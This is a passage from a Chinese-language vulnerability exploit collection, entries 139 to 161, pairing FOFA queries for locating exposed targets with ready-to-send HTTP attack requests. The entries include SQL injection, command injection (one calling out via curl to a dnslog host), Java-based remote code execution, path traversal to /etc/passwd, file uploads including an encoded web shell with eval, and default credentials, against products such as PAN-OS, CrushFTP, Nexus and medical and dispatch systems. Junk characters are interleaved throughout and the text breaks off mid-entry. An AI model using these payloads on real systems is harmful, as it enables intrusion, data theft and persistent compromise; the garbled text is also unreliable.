6 [& k$ ?# o6 V- l9 Z H1 \3 p0 _' C( @" I, N$ R( v7 `" x
, C) w& }; U8 H @139. 福建科立讯通信指挥调度平台editemedia.php sql注入
7 n4 E% d u9 @$ m- n( `6 MCVE-2024-2622* c' a! s7 O, ^8 b) j
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"& s3 t+ d- |! A
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1$ F8 Q) s4 f6 ]2 E
Host: x.x.x.x7 M' o$ [0 ?/ x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; | [( p- @& ^3 g, m/ S f# q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) V8 C; {* H% Y# m7 J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, u! \' I) |$ Z! W) _4 L
Accept-Encoding: gzip, deflate, br
* @3 z# T7 S* U% z& ^3 |Connection: close4 F5 y" y R# M M1 Y2 h& h0 P+ i
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk& y( `* ?- R7 M8 n3 w
Upgrade-Insecure-Requests: 1( A1 _8 o* I* o/ u, o: W2 _: i
/ ~) H/ h: D, M# |& V2 L
# I" q1 d8 e" d" \' ]; a
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入3 Q7 M! \9 ]4 z6 x% w
CVE-2024-2566
! v |: x' C5 U4 oFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"' W% h) B: p3 E" A5 G
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
t+ v5 { f, O1 G |0 }Host: x.x.x.x
$ b4 X9 H) t# O" G, C, d$ y; ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
7 R2 ~2 `# _+ k4 ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* V- N1 j4 \. @& Q% vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) i4 X+ t$ G' _1 C; J# t) y9 A9 oAccept-Encoding: gzip, deflate, br
9 i& S/ ^ M) u: DConnection: close
1 a" ?& v& p* W4 hCookie: authcode=h8g9: @ h0 X C, ?& o x: R0 y
Upgrade-Insecure-Requests: 1
- q4 w9 Z* v5 F: E6 W4 j0 S* A6 m5 l2 J
I) X$ l3 @9 o; a/ u5 m K& G9 W141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入- ?3 b+ ^4 h: t8 o0 ^0 d. Q
FOFA:body="指挥调度管理平台"7 i8 ]) h6 u( Y8 e& Z$ H/ m
POST /app/ext/ajax_users.php HTTP/1.1! H& a. G+ E8 J+ g) A
Host: your-ip. i6 A% a6 S+ ^3 ^. _0 W
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info" k k5 ?- |4 J
Content-Type: application/x-www-form-urlencoded
# p) M! u6 g8 p! s2 J+ }5 |+ o% Q4 L
; U1 ^1 x/ U2 |2 U+ r1 _; _- Q r" Y
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -$ m7 V) l6 `3 Y5 U0 \! @# G
6 L0 J3 N; f7 d2 J4 P3 U( E' v# h) y* o2 Z
142. CMSV6车辆监控平台系统中存在弱密码
& q8 k: p9 U" P/ F p* t* `CVE-2024-29666' U! i0 \" o3 Q5 V, B& m* {
FOFA:body="/808gps/"
7 X8 h& }& h/ H, v& R- i% C) c& Oadmin/admin
2 _7 f/ o- D! e F/ H! e143. Netis WF2780 v2.1.40144 远程命令执行( A, v: V# B/ i+ |+ J% C& g: T: Y
CVE-2024-25850" E1 H6 e6 O, J6 g! ^9 \
FOFA:title='AP setup' && header='netis'
6 J8 Z- Y& f+ E9 V) [4 M- S) }PAYLOAD2 i& s, N L' A" O
3 d/ N' s& P: _144. D-Link nas_sharing.cgi 命令注入
' w0 b' h' p% H2 x `FOFA:app="D_Link-DNS-ShareCenter"
: E$ F' H6 p: |& H g+ Usystem参数用于传要执行的命令: s0 n0 y. n% ]6 Y
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1" L# H. U9 N. D, ], h
Host: x.x.x.x3 c$ ^. c8 _) C* H- y1 ~# ^" T
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
% `% m( e$ F3 o" Z" x9 D: u' uConnection: close
9 X; U; _# I% h2 i7 m* M; K. kAccept: */*
$ t% f" n/ ]# Y; Z# K4 {Accept-Language: en# A+ E8 B6 j5 S: c' `( V5 a7 i
Accept-Encoding: gzip
" U m6 u! R9 v. f$ E1 | Q d& v6 G
" H: C f% \" e! o. {" _145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
6 `; U8 E) j) t3 d$ @- o2 v% `CVE-2024-3400% B! s! r+ _6 Q$ J6 D
FOFA:icon_hash="-631559155"
5 O" x! @$ U' }, M5 B; h3 [GET /global-protect/login.esp HTTP/1.1# i8 q0 |% A3 H
Host: 192.168.30.112:1005
3 ? @! W& ?& n, RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.845 G4 y/ N6 S) K% ~$ |
Connection: close) z# U& N/ z; r& p8 `+ M& D
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
4 h' C4 o7 Q& Z6 z' NAccept-Encoding: gzip
" z" S. N" o4 x/ h. M: t# L( w9 Z
6 }, D% l% C9 l# }0 g
# d" D+ I5 {0 D* s% h0 N146. MajorDoMo thumb.php 未授权远程代码执行3 q* Y3 b% {5 D5 d9 x3 G& i
CNVD-2024-02175
; F- I7 j$ ?, Y, RFOFA:app="MajordomoSL"
- i; e4 B4 N' c: NGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
6 h; T# E2 Q1 ?8 ~4 m* }# L9 ?Host: x.x.x.x
" \" V; _) q! k6 H' |; {4 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84$ \" _* Z* }1 V$ ^2 \
Accept-Charset: utf-8
+ ?2 x1 M4 z% I9 [, W2 Z( `Accept-Encoding: gzip, deflate
8 A T) h( u8 Q; v8 W: C) e _, RConnection: close
4 L& h7 C' q. [* ]6 q5 A3 p7 Y+ l; [' t- j
9 x+ H& R8 X2 R7 R9 f/ _# l# ?147. RaidenMAILD邮件服务器v.4.9.4-路径遍历3 F) z$ n8 q( w9 E
CVE-2024-32399
. h+ O) d' Z6 s- QFOFA:body="RaidenMAILD"- N- z) t3 e5 K$ s. `, W
GET /webeditor/../../../windows/win.ini HTTP/1.1
7 G. U f0 ^1 }1 DHost: 127.0.0.1:81
: Q# @. y1 B2 @Cache-Control: max-age=0* [4 Q, C/ h' n( h; G) z# b" E
Connection: close1 s$ L) w( ]2 M: W% c1 E
$ k, Z; D4 t; L4 M8 p1 U
& I2 @' O( M& n. @3 [7 d; I
148. CrushFTP 认证绕过模板注入0 B8 q/ p) j& I+ m/ ^! H
CVE-2024-4040, ~" V- T& X2 E1 J" P( B
FOFA:body="CrushFTP"
+ o8 f6 p& F9 K% e5 |4 \5 l+ Y& UPAYLOAD
. z4 U6 t7 ?3 y# R) f; Z r+ h( Q( P8 [7 t+ e( t$ L
149. AJ-Report开源数据大屏存在远程命令执行
8 \* B! W& {9 ^# z3 uFOFA:title="AJ-Report"3 X: ?6 ?6 R0 p
! }! j( E. `& J& ^) CPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
! g E, Z) e/ ]& a3 tHost: x.x.x.x
) Q; Q7 q! \& D8 w: G; ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
: m1 g7 _. X3 |) `. U* T- [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 F& J+ w2 v4 h1 D* \9 C' t+ H
Accept-Encoding: gzip, deflate, br1 C! @( s- {! b& R
Accept-Language: zh-CN,zh;q=0.9/ D4 U* Z4 `0 k
Content-Type: application/json;charset=UTF-8
, ~. {8 N5 O sConnection: close
" |# s9 V+ q' n5 y( D* K6 o
/ t( W6 ^. ?5 X. O5 l9 `3 {{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
2 H' A6 Z! m& O$ G) B7 i+ T: j( O1 M2 `0 h. u! B# O9 V; c2 X
150. AJ-Report 1.4.0 认证绕过与远程代码执行2 V2 P7 e1 {( Y! T) C! c5 X/ K6 V5 Q
FOFA:title="AJ-Report"
; N0 e- N% x, P4 f i6 c2 \5 ?POST /dataSetParam/verification;swagger-ui/ HTTP/1.1& o. V3 Z; l( P* h7 p1 |
Host: x.x.x.x
d! E9 ^8 B+ G- A6 I; z! x4 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
1 G" v- @; ^/ Y$ @: _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ k: s2 r9 M1 XAccept-Encoding: gzip, deflate, br) g' b$ f1 q% W' m' I
Accept-Language: zh-CN,zh;q=0.9
6 w' q5 M n6 D$ bContent-Type: application/json;charset=UTF-8
, T, y0 |$ b* }) A8 BConnection: close
4 T; R9 q& C3 R4 {$ [Content-Length: 3398 A4 a; j( K+ E1 U
' A+ n o/ Y- b' S4 G
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
# p, E" k7 J# T& |+ i
7 M3 H4 X! W3 u. U9 [! f7 P6 Z+ c7 Y. B- Q' ~
151. AJ-Report 1.4.1 pageList sql注入
/ [' D8 z$ M& r' zFOFA:title="AJ-Report"
( I0 a0 o: F% ~6 e- VGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
+ t( c5 f# F2 T- g( K. L9 vHost: x.x.x.x
2 @4 `7 H, w5 a# HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 E3 z; }' u$ g( R
Connection: close$ c/ f' T9 u( [" G
Accept-Encoding: gzip
9 ~) \8 r9 R# F
0 Q$ }/ R$ n$ a: V4 x7 [
+ Y. L2 K2 l& d, k$ u! Z9 M: e152. Progress Kemp LoadMaster 远程命令执行& e( L1 [; |# \% r$ B
CVE-2024-12123 `8 ?1 m) G( N) n7 {
LoadMaster <= 7.2.59.2 (GA)2 o4 g+ w1 I1 w7 i2 B
LoadMaster<=7.2.54.8 (LTSF)5 w/ S8 Y3 ^3 |1 r8 P% g
LoadMaster <= 7.2.48.10 (LTS)! P, {( H- y7 P0 r& @% `5 H0 L6 p
FOFA:body="LoadMaster", f' z) l! Y/ y6 f- f
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码3 }0 S* g2 U# N( Z+ G9 \
GET /access/set?param=enableapi&value=1 HTTP/1.1% w4 Q5 ^3 o) i& B1 u: ~# o6 d
Host: x.x.x.x' b/ J+ d8 X4 D5 _/ V; F# L* L$ s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1# u: v* M" R3 X6 ^6 B
Connection: close; |4 ~+ A/ p9 t2 o3 }6 m2 W+ L
Accept: */** B5 R5 D! T' v @7 _
Accept-Language: en
6 K; S6 R4 e8 E6 L9 PAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=4 I$ O' F9 B* ^
Accept-Encoding: gzip
) w: P8 z# y) {7 A B' ?2 G* Q8 T; u& v# P' R
+ V% _/ X4 N6 m# r6 p/ Y5 g' q
153. gradio任意文件读取
6 B, Y# j' i6 Z/ S; ?9 H. bCVE-2024-1561FOFA:body="__gradio_mode__"+ y9 L. J% u% x" F
第一步,请求/config文件获取componets的id" X* b4 R+ \$ l) v/ E- T
http://x.x.x.x/config
! i/ v- x/ e, V' P, Y1 r4 l- l7 q. t! m4 M7 H
8 e8 W% e$ f8 X
第二步,将/etc/passwd的内容写入到一个临时文件, b0 ~, p) A( k( B
POST /component_server HTTP/1.1
& h+ s2 k* D) R/ tHost: x.x.x.x
3 U- k( I9 M8 z2 Z; t0 X8 m" WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3+ D3 g6 s) X. m/ a
Connection: close
/ k( ^! o9 |! z7 r9 q; cContent-Length: 1155 |/ M9 m5 ?( c6 c' \/ E* E4 A
Content-Type: application/json: [6 G Y: L; J' N W6 A) Y
Accept-Encoding: gzip
\/ i, T9 r ^" y( \+ v- O
5 w ~; T: {/ w{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
/ ?% ^; w d8 q/ ?; k: ~) @. A% I% g! F& P, f& _
$ Z, H! Y7 @1 |7 T# @, W第三步访问
7 [2 [7 \: G' ^. thttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
4 e# X. ?- y( S( d6 d
! E- w! J; I* y9 M/ |1 l2 n2 N2 C
6 D8 D y" S9 F# t9 M154. 天维尔消防救援作战调度平台 SQL注入
- ]" ]7 |* m/ w! ]; \- I3 GCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"$ V* p3 Z( O9 l9 d( ~
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
6 H0 \' x4 w9 E- @% K+ QHost: x.x.x.x
+ _4 d" ^1 \- k1 V6 _Content-Length: 106
6 y: ~" M' k. F& tCache-Control: max-age=07 ~7 B6 D0 o( `6 m, n+ n" U' W6 z
Upgrade-Insecure-Requests: 1
5 N' B. Q( _" p1 bOrigin: http://x.x.x.x
5 M3 u9 G, x1 YContent-Type: application/json
/ ]3 J( [( F; f, E f5 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.368 e+ v- E4 b( \, q; {5 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- d1 e# B% b; [& u1 B9 [, N, rReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
C+ r: n4 P& b% eAccept-Encoding: gzip, deflate
+ A( W2 `7 ]/ Q6 o. I1 L0 K9 k/ l1 uAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
B+ l p; m, r ^* TConnection: close
4 F) X, v9 h6 Q7 @
. {' d7 D! W( {' ~+ n0 T{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
3 j, I/ d# G5 i4 \$ V& p2 e$ i& r) N. s1 n3 h
t5 R' j' }: [! o1 x' A' G' G
155. 六零导航页 file.php 任意文件上传
: N$ _, a, Q9 U) A2 HCVE-2024-34982
; `& X2 C1 M# i' d0 aFOFA:title=="上网导航 - LyLme Spage"8 p' \' Q' G5 n
POST /include/file.php HTTP/1.1
. ~$ {' W4 j% Q% \: pHost: x.x.x.x" r) x3 f( X' o8 m. ^6 Z, b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0; G0 s) t! L% s8 i; c9 Z/ X
Connection: close
6 m; a% O' W9 |; a/ O kContent-Length: 232
% w9 N9 A/ t: O. `( g; @. SAccept: application/json, text/javascript, */*; q=0.01- E r3 s: s- i1 f3 T7 R' p
Accept-Encoding: gzip, deflate, br
4 ]/ q' [4 M& `: p9 m2 {0 AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 y* D4 u1 ^) u7 {$ |, \( I
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
0 a, B; d6 X0 q( e R# w1 D. ~X-Requested-With: XMLHttpRequest/ R6 O, l, r+ R4 v! D6 Z3 ]3 h( B n
# ~. b! k( b- n+ D# a-----------------------------qttl7vemrsold314zg0f
- N' U- q/ z& p! _Content-Disposition: form-data; name="file"; filename="test.php"
% O, g+ p1 s2 pContent-Type: image/png
5 G5 D/ }9 Q5 V6 @
/ }0 R" a! \) w* f, r; e: [2 u<?php phpinfo();unlink(__FILE__);?>
5 W+ c! C# R! H-----------------------------qttl7vemrsold314zg0f--; |* W, i! ?! l1 p- [
6 w' W4 ^ Y( x) R# G
$ J H4 A, l. P& h4 [访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
# S. y# G% x8 C& L% L* o6 G$ l+ `6 V m* Z
156. TBK DVR-4104/DVR-4216 操作系统命令注入% z; M8 Q; I/ H9 p4 }3 A9 {) A" Q
CVE-2024-37218 X0 ?5 F5 e3 A3 M/ E
FOFA:"Location: /login.rsp"
) g* f3 ]$ r5 m. y·TBK DVR-4104
/ A7 u* j3 E5 G/ i5 q$ m! [·TBK DVR-4216- x/ G) p) F) E8 n# p
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"& T/ _8 w) O2 s* `3 v5 D7 ~
7 p, T& m: I# w9 ~- Y0 p) Z0 {. o' R2 r0 h1 G
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1- C- m2 {3 z% @. s5 d; W5 {6 g) G
Host: x.x.x.x k4 g" k1 y8 e2 k; n7 M$ J
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 C6 y) K' J9 H
Connection: close6 C( k" f1 B$ N
Content-Length: 0
, y: o/ \( S* M* [! b+ @1 `: PCookie: uid=1
3 _: O7 ]; I* _. QAccept-Encoding: gzip
' z- L' Q9 ?: W' }( U; V; o& p
+ w; \- G- G8 a7 b8 [0 }' h& v. P- s D7 T2 L2 I% v
157. 美特CRM upload.jsp 任意文件上传
* i1 R" J0 x9 W" q: mCNVD-2023-069711 i; N3 g/ T- R% K+ |3 f
FOFA:body="/common/scripts/basic.js"1 l N& o z+ O
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
& B# T9 Z! ]& F& ?Host: x.x.x.x1 f! [. _: l6 b4 ^* v, U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36. H8 l2 ?9 d: W% \0 m3 f! `6 ~+ n
Content-Length: 709
3 b7 C" E0 A1 O! hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! ?. [/ j2 f1 [Accept-Encoding: gzip, deflate
; }" n* x2 o5 q# t" OAccept-Language: zh-CN,zh;q=0.9* [" o6 t3 d. ~* |( v" F
Cache-Control: max-age=0# W |- o8 w! H2 o4 B% `3 u
Connection: close
5 S2 ]( w; |3 l" B* V) BContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN) e8 }; N3 \/ d" v% i' P& ~
Upgrade-Insecure-Requests: 1
5 P; J: s" V: X8 v
7 u; D. f' Z- W9 ^6 ^3 V, \/ \: J6 F7 x( Z------WebKitFormBoundary1imovELzPsfzp5dN# C$ e3 s4 j# w
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"7 |7 p! f t; r" n! V2 V" K
Content-Type: application/octet-stream
i% `! |. E, z7 g+ o$ A: `& h9 H( H3 X
nyhelxrutzwhrsvsrafb# o, P8 B6 {( F Q$ E1 P
------WebKitFormBoundary1imovELzPsfzp5dN- D7 G& M+ t5 d) M' c5 j% H
Content-Disposition: form-data; name="key"2 j8 x1 ?) c1 h- l6 p1 o/ X
- G A ^; e( U+ b7 I0 q( W+ }& d$ _null
# m' P/ c1 g, q+ o6 Y4 f1 L------WebKitFormBoundary1imovELzPsfzp5dN
5 E" \- A C0 y7 ?* W1 j$ JContent-Disposition: form-data; name="form"
; i, r7 d. n( d- A5 j' ]. x4 \ r0 y9 p! B5 U& T
null8 t7 Q% e6 ]) I9 m9 u* v3 G% D. {
------WebKitFormBoundary1imovELzPsfzp5dN7 ?) ^; ^# d9 R8 c
Content-Disposition: form-data; name="field") u0 {4 T3 h$ W" w* s
9 l& _8 a7 Y( f/ W- s* U9 a9 F
null4 x( C8 K9 f, \+ m) v6 R/ @
------WebKitFormBoundary1imovELzPsfzp5dN/ Z7 k" c. h8 \% \1 P
Content-Disposition: form-data; name="filetitile"8 j& U/ X( R1 t! b
) s' I* f4 P- h" `; i: U$ A
null# o5 a- Q1 i! k" ^9 g
------WebKitFormBoundary1imovELzPsfzp5dN0 C5 w3 j9 i% I3 g6 @# T+ a3 r
Content-Disposition: form-data; name="filefolder"
0 N) ~4 Y. ?1 e; \* [" i
) g; \5 _! g4 ]9 o5 Q9 ~null
8 N$ w0 r7 c% X------WebKitFormBoundary1imovELzPsfzp5dN--
: ^& S5 n8 ^0 Y0 Z# Q Z
- n" n) A2 h: {9 r
+ ]5 T* X7 F) }7 W9 k% Shttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp& P. M1 j; }* `$ S
: I; t, g2 x5 G( q# a. Y; K& s+ Q4 k158. Mura-CMS-processAsyncObject存在SQL注入; d; A( K, v. ]% I4 \5 | L
CVE-2024-32640
e. n$ u, V0 h7 J: LFOFA:"Generator: Masa CMS"
# F2 I, w- V2 D$ I" }0 u$ JPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
# L7 l9 L% h2 e: q7 e \3 @Host: {{Hostname}}
( e. @- N/ `5 h9 tContent-Type: application/x-www-form-urlencoded0 V- y! D2 q) H0 k# G, X" l
4 f, G9 V, O% h/ {7 x
object=displayregion&contenthistid=x\'&previewid=1. i$ g' N. |( d# ~( c
+ O0 s2 _; E- b- T6 t
* e4 v5 ~6 b, e/ F4 \159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传* L3 o6 D+ k' h+ W# s& ]
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")# m+ T: J0 }# W% m1 q6 M. }( i' p
POST /webservices/WebJobUpload.asmx HTTP/1.1
. r: p! I0 n8 X' K& H; M! bHost: x.x.x.x& E; F: q% g' C5 G& y( w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.363 V/ C8 o: h, C* X' K! }, W
Content-Length: 1080" g m, V) }4 _- z
Accept-Encoding: gzip, deflate
! T) A) } g7 b8 O! H3 P5 m+ gConnection: close
8 s1 j7 e7 g# F+ h s5 @1 CContent-Type: text/xml; charset=utf-8
4 |% ^6 v# d, PSoapaction: "http://rainier/jobUpload"
. b1 J+ |. N, U. s0 Z p' h0 B) g2 G) F4 F
<?xml version="1.0" encoding="utf-8"?>! S4 M$ T/ }" D* n; s) e* u! f
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
v) Y3 `$ \/ Q<soap:Body>" O; _! A7 w: w
<jobUpload xmlns="http://rainier">8 N/ O( }2 h( q6 x7 p& j! E
<vcode>1</vcode>2 G, N- W1 e9 y
<subFolder></subFolder>$ L7 `+ ]* M8 }2 i( H( D" O& [
<fileName>abcrce.asmx</fileName>6 O5 E+ ]- c; d( J
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
; e4 j! Y& N5 i2 {</jobUpload>
) |# K" i" t5 h- g5 f4 V</soap:Body>
1 d$ L) n7 c8 B; y</soap:Envelope>
2 i" ^/ b* q+ o4 f* f+ s
0 J% l' r' f% j8 c6 I, d
! {% G6 K1 V1 B0 ]7 s H7 d( K/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
! r0 ^( |$ Y. Q8 R ]$ u( V3 a' s. [8 P
% C0 E) |) B5 V9 Q* W9 B
160. Sonatype Nexus Repository 3目录遍历与文件读取4 @& H- i9 }0 g) U
CVE-2024-4956
% P& R' ^* L! n4 @$ {( IFOFA:title="Nexus Repository Manager"
3 t" z- W! k; p" J" cGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1! s$ @; t3 n& {2 _
Host: x.x.x.x
! b0 X+ a3 _! F9 p) ]. T4 \5 U: HUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
, t" M: ]" n. s, ^- kConnection: close
) y' l/ y0 Y+ V9 N# @3 B: D- dAccept: */*
$ l. W+ i3 Y. A& f7 u. lAccept-Language: en
" o$ H6 |& v2 A: D- t+ k7 J* LAccept-Encoding: gzip
8 D- |8 c* _' c& H l% Z) ^1 @
5 `/ q" D: O, }( T6 {0 j3 i( q* {5 `; `3 H' W$ `! n
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传0 k6 f' ]& D( Q8 m0 F
FOFA:body="/KT_Css/qd_defaul.css"
, c$ j3 t2 q$ I; k+ n第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
/ ^9 P$ K3 _& Y) | P+ dPOST /Webservice.asmx HTTP/1.1
9 ?3 K' r- i: |$ d- C4 w7 B+ T$ RHost: x.x.x.x
; U$ q( |- ]0 C s: t7 z2 _0 G3 E8 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36# S) x7 U; \5 D! Y0 K6 X' @
Connection: close O. h; f6 U/ ]8 Q
Content-Length: 4450 H) _: ~2 U. u2 |+ W
Content-Type: text/xml; T& ]- u5 @. p: E+ H
Accept-Encoding: gzip4 U2 B; a3 u4 F; k& j# ^
. g q8 E, t5 T8 H2 r, E. i( \) L
<?xml version="1.0" encoding="utf-8"?>/ y9 L" M& E3 C1 ~4 f- F* O: b
<soap:Envelope xmlns:xsi="
